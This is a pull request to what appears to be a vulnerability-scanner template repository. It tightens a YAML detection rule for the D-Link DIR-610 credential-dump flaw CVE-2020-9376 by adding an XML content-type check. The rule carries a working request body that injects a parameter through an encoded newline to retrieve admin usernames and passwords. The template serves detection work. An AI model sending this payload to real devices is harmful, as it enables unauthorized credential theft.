### PR TITLE
Update dlink-cve-2020-9376-dump-credentials.yml

### DIFF
--- a/pocs/dlink-cve-2020-9376-dump-credentials.yml
+++ b/pocs/dlink-cve-2020-9376-dump-credentials.yml
@@ -7,7 +7,7 @@ rules:
     body: >-
       SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
     expression: >
-      response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
 detail:
   author: x1n9Qi8
   Affected Version: "Dlink DIR-610"


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的

dlink-cve-2020-9376

## 测试环境

见之前师傅提供

## 备注
只做检测优化 